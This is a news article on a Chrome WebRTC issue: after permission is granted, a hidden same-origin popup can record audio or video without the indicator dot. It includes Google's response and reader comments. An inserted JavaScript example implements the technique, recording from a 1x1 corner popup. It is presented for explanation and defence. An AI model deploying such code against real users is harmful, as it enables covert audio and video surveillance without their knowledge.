Naked Security

Chrome bug that lets sites secretly record you ‘not a flaw’, insists Google

Definitely not a security issue, says Google, as it moves to address flaw that could have you inadvertently starring in someone else's movie

Remember last year’s Google Chrome bug that gave pirates a way to steal streaming movies?

Well, we’re ready for our closeup, Mr DeMille! This time, we’re potentially the stars of hackers’ movies: there’s a Google Chrome “bug” (depending on who you ask) that allows sites to surreptitiously record audio and video, all without an indicator light.

As BleepingComputer reports, AOL web developer Ran Bar-Zik discovered the issue – which Google says is not a security vulnerability – while at work, when he was dealing with a website that ran WebRTC code.

WebRTC is a set of browser APIs and protocols for streaming audio and video over the internet in real time via peer-to-peer connections.

On the “this is not a security bug” side of the coin, a user first has to grant a site permission before it can access the camera and microphone. After a site receives permission to stream audio and video, it can run JavaScript code that records the audio or video content before it sends the content to the other participants of a WebRTC session, as Bar-Zik’s bug report explains.

The thing is, the JavaScript doesn’t have to run in the same tab as the one where the permission was granted. It can record from a separate tab or popup window that doesn’t display the red recording dot that indicates WebRTC is capturing media. Thus, once permission has been given, the site can listen to the user whenever it – or a hacker – wants to.

The recording is done via the JavaScript-based MediaRecorder API, according to BleepingComputer.

Bar-Zik reported the issue and heard back from Google on the same day. Its argument was that the red recording icon isn’t present in all versions of Chrome, so the real place to defend against an attack is the permissions popup. Google’s take on it:

This isn’t really a security vulnerability – for example, WebRTC on a mobile device shows no indicator at all in the browser. The dot is a best-first effort that only works on desktop when we have chrome UI space available. That being said, we are looking at ways to improve this situation.

Bar-Zik doesn’t buy it. He says that it would be pretty easy to trick a victim who’s suffering from “I’m not reading another pop-up, I’ll just click OK” permissions fatigue.

“Real-world attacks aren’t going to be very obvious,” he told BleepingComputer. From the writeup:

For example, Bar-Zik argues that an attacker could use very small popups to launch the attack code. This code can use the camera for a millisecond to take a user’s picture, or for hours, recording the user’s movements or nearby audio.

If the user doesn’t notice the popup in his toolbar, there’s no visual indicator to cue him that someone is accessing his audio and video components. One of the sneakiest scenarios would be if the attacker disguised the popup as a mundane ad. If the user doesn’t immediately close the ad’s popup, an attacker remains with a surveillance channel open on the user’s PC.

An attacker wouldn’t even have to create a website to steal the recording permission, he said. Rather, they could exploit a cross-site scripting (XSS) flaw – also known as one of the web attacks that refuse to die – on legitimate websites that have already been granted audio and video access.

Bug? Not bug? You can decide for yourself: Bar-Zik has put up a harmless demo that asks you for permission, launches a popup when you click OK, records 20 seconds of audio, and provides a download link for the recorded file.

The proof-of-concept code is also available for download here.
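To make the mechanism described above concrete (permission granted once per origin, then recorded with MediaRecorder from any same-origin document, including a popup), here is an added example written for this page. It is not Bar-Zik’s proof-of-concept and not Google’s code; it only uses the standard getUserMedia and MediaRecorder APIs. The function names (`requestMic`, `recordStream`, `offerDownload`, `runDemo`, `openRecorderPopup`) are this example’s own. The browser objects are passed in as parameters with browser defaults, so the recording logic can also be exercised outside a browser with fake objects; in a page, `runDemo()` needs no arguments.

```javascript
// Added example (not the article's PoC): permission-then-record flow with the
// standard WebRTC/MediaRecorder APIs. Browser objects are injectable so the
// core logic can also run under Node with fakes.

// Ask once for the microphone. Chrome stores the grant per origin, so a
// same-origin document loaded later (for instance a popup opened with
// window.open from the granted page) receives the stream without a new prompt.
function requestMic(mediaDevices = globalThis.navigator && globalThis.navigator.mediaDevices) {
  if (!mediaDevices || typeof mediaDevices.getUserMedia !== 'function') {
    return Promise.reject(new Error('getUserMedia is not available in this context'));
  }
  return mediaDevices.getUserMedia({ audio: true, video: false });
}

// Record `stream` for `durationMs` and resolve with one Blob of encoded audio.
// MediaRecorder delivers data through `dataavailable` events: with a timeslice
// it emits a chunk every `timesliceMs`, and stop() flushes whatever remains.
function recordStream(stream, durationMs, opts = {}) {
  const {
    MediaRecorder = globalThis.MediaRecorder,
    setTimer = globalThis.setTimeout,
    timesliceMs = 1000,
  } = opts;
  return new Promise((resolve, reject) => {
    const chunks = [];
    const rec = new MediaRecorder(stream);
    rec.ondataavailable = (e) => {
      if (e.data && e.data.size > 0) chunks.push(e.data); // ignore empty flushes
    };
    rec.onerror = (e) => reject(e.error || new Error('MediaRecorder error'));
    rec.onstop = () => resolve(new Blob(chunks, { type: rec.mimeType }));
    // If the user revokes the permission or unplugs the device mid-recording
    // the track ends; stop cleanly instead of waiting for a timer that may
    // never matter.
    for (const track of stream.getTracks()) {
      track.onended = () => { if (rec.state !== 'inactive') rec.stop(); };
    }
    rec.start(timesliceMs);
    setTimer(() => { if (rec.state !== 'inactive') rec.stop(); }, durationMs);
  });
}

// Release the device. While tracks are live, Chrome shows its recording dot
// (on desktop, in the tab that owns the stream); stopping them clears it.
function stopTracks(stream) {
  for (const track of stream.getTracks()) track.stop();
}

// Browser-only: offer the recording as a download, as the demo does.
function offerDownload(blob, filename, doc = globalThis.document) {
  const a = doc.createElement('a');
  a.href = URL.createObjectURL(blob);
  a.download = filename;
  a.textContent = `Download ${filename} (${blob.size} bytes)`;
  doc.body.appendChild(a);
  return a;
}

// Browser-only: open a tiny same-origin window. If `url` is a page on the
// granted origin that calls runDemo(), the recording happens there, not in
// the tab where the user clicked "Allow".
function openRecorderPopup(url, win = globalThis.window) {
  return win.open(url, 'recorder', 'width=1,height=1,left=0,top=0');
}

// Entry point for a page or popup: prompt (or reuse the origin's grant),
// record 20 seconds, release the microphone, then show the download link.
async function runDemo(durationMs = 20000) {
  const stream = await requestMic();
  try {
    const blob = await recordStream(stream, durationMs);
    return offerDownload(blob, 'recording.webm');
  } finally {
    stopTracks(stream);
  }
}
```

The defensive reading of the same code: a grant made in one tab is reused by any same-origin script that can later run, which is why an XSS bug on a site that already holds camera or microphone permission is enough for the attack the article describes, and why revoking stale grants (Chrome’s site settings) matters more than watching for the dot.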


11 Comments

Is there a way to disable?

Yes. Either disconnect the camera/microphone or disable JavaScript.

Disabling JavaScript is a bit of a pain, as you have to individually authorize each site to use it, however it stops a lot of autoplay videos, animated ads and other shenanigans cold.

Indeed, I would like a “Don’t allow any site to record me ever, don’t bother even asking permission” setting.

Disable WebRTC which honestly from a security and privacy standpoint you should have disabled anyway as it leaks information such as your real IP address and location even when using a VPN.

Well, if it’s intended behavior it’s certainly not a bug. It is however very much a vulnerability. But I don’t think a recording indicator is a good mitigation. The way I see it the only real way to mitigate it is to make the permissions more finely grained and to limit the scope to which they apply.

Click the Chrome menu on the browser toolbar.
Select Settings.
Click Show advanced settings.
In the “Privacy” section, click Content settings.
In the “Media” section:
Ask when a site requires access to your camera and microphone: Select this option if you want Chrome to alert you whenever a site requests access to your camera and microphone.
Do not allow sites to access your camera and microphone: Select this option to automatically deny any site requests to access your camera and microphone.
Click Manage exceptions to remove previously-granted permissions for specific sites.

You can learn more here.

Google is correct, it’s not a bug. Users have to enable the permission for the site. The fact that they don’t pay attention to what permissions they’re granting isn’t Google’s fault. The only thing that is hidden is the indicator that it’s actually recording, but if you don’t allow it in the first place that’s not an issue.

It’s a flaw in how JavaScript does security — fundamentally. We complained about it when Microsoft tried to do it in 1998, and prevented it from becoming a standard. Just about everything in HTML5 — very nearly all of it — is stuff the security community, some of your employees at Sophos included, directly objected to when Microsoft tried to do it in 1998 to 2000.

The difference is there are enough users now that it doesn’t matter what security experts / people think about how safe something is (or isn’t). It’s going to happen and be pulled into JavaScript and HTML regardless, because Google can simultaneously drop any discussion about the negatives straight off of search, and get a handful of evangelists very excited about whatever technology to promote it.

At the end of the day, nearly 100% of what HTML5 added can be abused, and same-site origin is getting to be a massive problem. Sites are pulling in scripts from dozens of CDNs, and it’s all just a giant gaping security hole. All we can do is plug the worst of it, after it happens – and hope that it doesn’t take a disaster for Google to start listening.

I’ve considered this a problem for years, and I don’t consider it a problem with Chrome any more than I do for any other browser. It’s no more Google’s fault than Microsoft’s, Apple’s or any other browser creator’s.

I have a very simple way to disable the video recording. I have a custom-designed piece of cardboard placed over the video camera lens, hinged so I can move it out of the way when I actually want to record video.
